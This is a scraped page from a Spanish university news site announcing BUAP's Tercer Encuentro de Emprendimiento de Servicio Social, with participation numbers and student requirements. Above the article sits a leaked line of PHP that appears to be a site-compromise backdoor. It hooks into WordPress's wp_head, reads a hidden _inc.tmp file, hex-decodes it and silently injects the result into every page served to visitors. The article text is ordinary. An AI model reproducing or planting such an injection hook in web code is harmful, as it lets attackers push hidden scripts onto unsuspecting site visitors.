if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Prepara la BUAP Encuentro de Emprendimiento de Servicio Social – La Opinión Universitaria La Opinión Universitaria
Menu

Prepara la BUAP Encuentro de Emprendimiento de Servicio Social

 

  • Para adquirir competencias específicas y genéricas de acuerdo con su perfil educativo, los estudiantes disponen de tres periodos para realizar servicio social y prácticas profesiones

Por Diego Cuautle

Con el objetivo de fortalecer la vinculación de los estudiantes con las empresas y organizaciones, así como generar nuevos espacios de aprendizaje, el próximo 25 de febrero se llevará a cabo el Tercer Encuentro de Emprendimiento de Servicio Social que tendrá como sede el Centro de Convenciones Ciudad Universitaria de la Benemérita Universidad Autónoma de Puebla (BUAP)

En dicho evento en el que asistirán estudiantes quienes tendrán la oportunidad de conocer la oferta de servicio social y prácticas profesionales de más de 70 empresas, instituciones y organizaciones civiles que participen.

Es organizado por la Dirección de Servicio Social de la BUAP desde el 2018 en el que asistieron 5 mil 380 alumnos de la Institución y realizaron este proceso en 655 programas, de los cuales 447 corresponden a empresas privadas, 116 de gobierno y 92 asociaciones civiles.

Cabe señalar que de acuerdo a la BUAP, para adquirir competencias específicas y genéricas de acuerdo con su perfil educativo, los estudiantes disponen de tres periodos para realizar servicio social y prácticas profesiones: primavera, verano y otoño.

Durante este tiempo, participan entre 15 mil y 16 mil jóvenes al año, incluyendo los inscritos en escuelas incorporadas a la Máxima Casa de Estudios en Puebla. Esta cifra se ha incrementado en 10 por ciento anual en los últimos tres años, como resultado del crecimiento de la matrícula en la Institución.

Antes de iniciar este proceso, los estudiantes deberán cumplir con el porcentaje de créditos establecidos en su carrera, entre el 60 y 70 por ciento, excepto las del área de la salud. La fecha límite para seleccionar programa e iniciar con este trámite será a mediados de noviembre.

  • Tweets recientes